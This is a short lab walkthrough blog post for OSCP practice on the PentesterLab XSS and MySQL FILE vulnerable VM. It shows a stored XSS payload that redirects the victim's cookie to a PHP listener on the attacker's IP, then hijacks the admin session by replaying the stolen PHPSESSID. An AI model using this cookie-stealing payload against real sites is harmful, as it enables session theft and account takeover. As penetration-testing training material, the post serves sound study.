OSCP Security Technology - Cross-Site Scripting(XSS)

OSCP Security Technology - Cross-Site Scripting(XSS)

Installing XSS & MySQL FILE

https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/

Exploit this VM

Find the IP address of XSS_MySQL_File virtual machine.

netdiscover

image-20210808170213888

Browse this PentesterLab vulnerable blog through Firefox.

image-20210808170400416

Click Test buttion, and find a good place to test XSS.

<script>alert('XSS')</script>

image-20210808170917477

Submit this query. Everytime fresh this website, we will see the alter .

image-20210808171107376

Create a index.php file on the root folder.

nano index.php

<?php

$cookie = isset($_GET["test"])?$_GET["test"]:"";

?>

Run the php service.

service apache2 stop
php -S 192.168.2.26:80

image-20210808172423960

Submit a new query.

<script>location.href='http://192.168.2.26/index.php?test='+document.cookie;</script>

image-20210808174455969

Then we can find the PHPSESSIONID on the backend.(a0b4od8kee0jlj9oeumjb819t3)

image-20210808174810704

Install Firefox Add-on - Cookie Quick Manager.

image-20210808175034119

Click button - Manager all Cookies.

image-20210808175210057

Edit and save the cookie value the current one which find from the backend.

image-20210808175443374

Refresh the website and click Admin button, then we can login without username and password.

image-20210808175659969

We can post a new blog now.

image-20210808175920811

posted @ 2021-08-08 18:02  晨风_Eric  阅读(61)  评论(0编辑  收藏  举报